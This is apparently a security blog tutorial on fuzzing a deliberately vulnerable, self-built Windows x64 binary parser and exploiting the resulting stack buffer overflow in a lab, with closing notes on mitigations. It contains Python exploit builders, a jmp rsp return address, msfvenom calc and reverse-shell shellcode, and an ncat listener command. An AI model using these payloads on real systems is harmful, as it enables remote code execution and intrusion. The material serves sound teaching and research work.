Fuzzing-and-exploiting-a-crash

Hunting 0-days: Exploiting a Custom Binary Parser on Windows x64

0. Introduction

Before a CVE gets a number and a patch, someone had to find it. This is what that process actually looks like, from a fuzzer detecting an anomaly to a reverse shell landing on the attacker’s machine. The classic approaches for finding them are:

Type Explanation
Static analysis Disassembling the software and understanding it
Dynamic analysis Testing and understanding the software’s reactions by debugging and running it
Taint analysis Studying how the program handles and returns data

Most security researchers rely on existing fuzzers. I wanted to understand what happens underneath so I built one. I integrated a custom Structure-aware seed generator that knows where, how and how intense to mutate the data in order to trigger certain vulnerabilities.

1. Preparation

The environment we are working in is Windows x64.

The file we will be testing is a realistic binary parser. It has 4 vulnerable functions inside and, to test how well my fuzzer performs, I added 4 layers of security that filter the input before parsing it. I then compiled it without stack protector for demonstration purposes.

The fuzzer I used is not publicly available yet since it’s still under development but you can easily use another one like AFL++.

The debugger I used is x64dbg and I developed the exploit and POC (proof of concept) using Python.

2. Fuzzing

To develop the corpus, my fuzzer needs a starting seed, a form of input that our target parses without crashing, like it normally would. If you don’t have a corpus you can find one searching for it on github depending on the extension you need. In my case, my starting seed is a .bin file.

Aiming the fuzzer at the target, loaded with the seed, I get this:

Instantly, it found a crash seed that bypassed the security layers and stopped the process so we can continue our research.

As we can see, the fuzzer tells us that the type of mutation that caused the crash is called Boundary. My tool’s function that creates this kind of mutation looks like this:

This function “lied” about the size of the data we were going to feed to the victim (Length Corruption) resulting in the crash. So with these in mind, we can assume that the crash was caused by a Buffer Overflow.

3. Debugging

Let’s fire up our debugger and find out what actually happened. After loading the target and passing it the crash_DETECTED.bin we can see that the execution stopped here:

Look at the memory dump! It has been overflowed, resulting in an EXCEPTION_ACCESS_VIOLATION error:

4. Gathering information

To confirm the vulnerability and measure the buffer we need to flood it with something called a Cyclic Pattern. This is no longer a big string of “A”-s that overflows the memory, it is a specially crafted payload that let’s us measure how much data we need in order to inject our own code into the Instruction Pointer (RIP). This pointer controls the direction of the processor’s execution, and by overflowing the stack perfectly, we can manipulate it to point to our malware and take control.

To inject our Cyclic Pattern I used the following code, that writes it into another .bin file:

import struct

payload =  bytearray()
payload +=  b'\x01\x02\x03\x04'  # Magic bytes (file format)
payload += struct.pack('<I', 1)  # Version number, converted into Little-Endian
payload +=  b'NormalTx' # OpCode for routing the execution
payload += struct.pack('<I', 0x150)

pattern = (
b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9"
b"Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"
b"Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9"
b"Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9"
)

payload += pattern[:200] 

with  open("crash_test.bin", "wb") as f:
		f.write(payload)

Give this to our target using the Command line and look at the registers and the stack:

The RSP displays our pattern, and it begins with 'a5Aa6Aa7Aa8...'. This means two things:

Section Dimension Content
Padding (junk) 12 bytes Aa0A a1Aa a2Aa
RIP (instruction) 8 bytes a3Aa a4Aa
RSP (where it lands) The rest a5Aa 6Aa7 (as shown before)

As you can see the pattern acts as ruler, we measure how many bytes we need to overflow the buffer (Padding), in order to reach the RIP and tell the processor to do (placing the instruction) and then let it execute the malware (RSP).

To do this we also need the following:

4.1 Creating the padding and reaching the RIP

As we discussed before, the padding needs to be at least 12 bytes. BUT in our environment (Windows x64) the processor only “understands” multiples of 8, so the next multiple of 8 after 12 is 16. In conclusion, the dimension of our padding needs at least 16 bytes. Keep this in mind.

4.2 Writing the instruction

The processor parses our padding and reaches the RIP. Here we will leave the address of an instruction that acts like a trampoline right to our malware. This kind of instruction needs to be a jmp rsp. This basically tells it to Jump to the RSP (where the malware is located).

We can find one of these in the target’s memory BUT, we know that ASLR randomizes the addresses so we will use an address directly from one of the Windows DLL’s (kernel32.dll or ntdll.dll):

In a real scenario with ASLR fully enabled, this address would change on every reboot. Defeating it requires either an information leak or a non-ASLR module, which we’ll cover later.

In x64dbg, we navigate to Symbols and look for kernel32.dll or ntdll.dll. Double-click on it and in the CPU tab, hit Ctrl+Shift+B to look for our instruction pattern. Here we insert FF E4 which stands for jmp rsp in hex:

In the References tab there is a list of addresses. We will choose one of these that doesn’t have null octets (00) in it:

Note down this address. We will need it later.

4.3 Placing the shellcode

The processor finally arrives in the RSP. Here is where the magic happens. We will store our shellcode here and before it, we will write a field of NOP’s (No Operation). The processor slides down through these NOP’s like a rollercoaster and lands right in our trap. The field doesn’t need a specific dimension so just to be sure it has some fun before executing the shellcode, we will use 32 octets.

I generated my shellcode using msfvenom. To prove it works, this code only pops up the calculator app.

msfvenom -p windows/x64/exec CMD=calc.exe -f python -b ‘\x00’

5. Proof of concept

Let’s recap before we continue :

Altogether, our Proof of Concept script looks like this:

import struct

payload =  bytearray()
payload +=  b'\x01\x02\x03\x04'  # Magic bytes (file format)
payload += struct.pack('<I', 1)  # Version number, converted into Little-Endian
payload +=  b'NormalTx' # OpCode for routing the execution
payload += struct.pack('<I', 0x150)

data_payload =  bytearray()
data_payload +=  b"A"  *  16 # filling the padding with at least 16 octets

jmp_rsp_address =  0x00007FF8709039D3 # replace with your own jmp_rsp address

data_payload += struct.pack('<Q', jmp_rsp_address)

shellcode = (        # msfvenom generated shellcode (CMD=calc.exe)
b"\x53\x56\x57\x55\x54\x58\x66\x83\xE4\xF0\x50\x6A\x60\x5A\x68\x63\x61\x6C\x63"
b"\x54\x59\x48\x29\xD4\x65\x48\x8B\x32\x48\x8B\x76\x18\x48\x8B\x76\x10\x48\xAD"
b"\x48\x8B\x30\x48\x8B\x7E\x30\x03\x57\x3C\x8B\x5C\x17\x28\x8B\x74\x1F\x20\x48"
b"\x01\xFE\x8B\x54\x1F\x24\x0F\xB7\x2C\x17\x8D\x52\x02\xAD\x81\x3C\x07\x57\x69"
b"\x6E\x45\x75\xEF\x8B\x74\x1F\x1C\x48\x01\xFE\x8B\x34\xAE\x48\x01\xF7\x99\xFF"
b"\xD7\x48\x83\xC4\x68\x5C\x5D\x5F\x5E\x5B\xC3"
)
data_payload +=  b"\x90"  *  24
data_payload += shellcode

final_payload = payload + data_payload.ljust(0x150, b'\x90')

with  open("exploit_calc.bin", "wb") as f:
		f.write(final_payload)

After loading the exploit_calc.bin in the target’s debugging session, set the memory permissions to ERW-- (Execute, Read, Write), and run it until the calculator pops up:

Setting the memory permissions to ERW-- is a shortcut in our exploitation process for the sake of the POC. In a future article I will explain how we can program our exploit to set these permissions itself using an *ROP (Return-Oriented Programming) chain*

And there it is! The processor executed our “malware” and opened up the calculator.

6. Exploitation (popping a shell)

We change the previous command to this:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b ‘\x00\x0a\x0d\x20\x09\x0b’ -f python

Now that we have a new shellcode we can adjust the size of our payload so it aligns with the stack and instruction pointers:

import struct

TOTAL_SIZE  =  0x300  # We make the size bigger, so the shellcode aligns perfectly
PADDING_SIZE  =  16

header =  bytearray()
header +=  b'\x01\x02\x03\x04'
header += struct.pack('<I', 1)
header +=  b'NormalTx'
header += struct.pack('<I', TOTAL_SIZE)

data_payload =  bytearray()
data_payload +=  b"A"  *  PADDING_SIZE

jmp_rsp_address =  0x00007FF8709039D3  # Replace with your jmp_rsp address

data_payload += struct.pack('<Q', jmp_rsp_address)
data_payload +=  b"\x90"  *  24

buf =  b""
buf +=  b"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d"
buf +=  b"\x05\xef\xff\xff\xff\x48\xbb\x63\xfe\x15\xf7\x62"
#...  write the shellcode msfvenom generated for you
buf +=  b"\x2e\x64\xa4\xea\x24\xea\x22\x62\x2e\x3d\xe5"  

data_payload += buf

final_content = header + data_payload.ljust(TOTAL_SIZE, b'\x90')

with  open("exploit_shell.bin", "wb") as f:
		f.write(final_content)

We setup a listener in another powershell terminal:

PS D:/> ncat -lvnp 4444

Now let’s feed exploit_shell.bin to our target and see what happens:

And there it is! A reverse shell right into the attacker’s machine, initiated when the processor executed our msfvenom generated shellcode.

7. Conclusion & Mitigation

The Role of the Crash: From Denial of Service to Control

Many people see a program crash as just a “bug” that closes the software, technically known as a Denial of Service (DoS). However, for an exploit developer, a crash is a strong starting point. Here is why the crash file was our best friend:

In the Information Gathering stage, an attacker is able to scan the target machine for the running software including it’s version. He can replicate everything inside his lab and develop an exploit without even touching the production server or alerting the victim’s security systems. This is called Off-target Debugging.

Even Google uses 25.000 virtual machines and about 100.000 cores fuzzing Chrome to find such bugs before the attackers do. Since Chrome’s launch, they discovered over 30.000 0day vulnerabilities.

How to prevent this?

That said, none of these are silver bullets. A determined attacker with enough resources can bypass DEP using an ROP chain. This is a technique that repurposes existing executable code instead of injecting new shellcode. ASLR can be defeated through information leaks. Stack canaries don’t protect against overwrites that skip the canary entirely. This is why defense in depth matters: the goal is to make exploitation so expensive that it isn’t worth it.

In the next article, we’ll look at exactly how a ROP chain bypasses DEP and what it takes to stop one.